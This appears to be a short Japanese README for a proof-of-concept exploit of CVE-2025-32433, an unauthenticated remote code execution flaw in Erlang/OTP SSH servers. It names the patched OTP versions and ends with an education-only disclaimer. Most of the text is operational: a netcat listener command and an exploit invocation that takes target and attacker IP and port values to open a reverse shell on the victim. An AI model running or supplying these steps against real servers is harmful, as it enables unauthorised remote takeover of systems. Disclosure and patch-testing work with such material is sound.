
Erlang/OTP SSHサーバーにおける認証なしのリモートコード実行を示すPoC。SSHプロトコルのメッセージ処理の欠陥を悪用することで、攻撃者は有効な認証情報なしにターゲット上で任意のコマンドを実行できます。
Erlang/OTP SSH サーバーにおける認証不要のリモートコード実行を示す PoC です。
SSH プロトコルのメッセージ処理の欠陥を悪用することで、攻撃者は有効な認証情報なしに対象上で任意のコマンドを実行できます。
この問題は OTP-27.3.3、OTP-26.2.5.11、OTP-25.3.2.20 で修正されています。
リスナーの設定:
nc -lvnp 1234
エクスプロイトの実行:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : 対象 IP--rport : 対象 SSH ポート--lhost : リバースシェル用のあなたの IP--lport : あなたのリスナーポート

このリポジトリは教育目的のみです。このエクスプロイトを、所有していない、またはテストする明示的な許可を得ていないシステムに対して使用しないでください。誤用は違法となる可能性があり、固く禁止されています。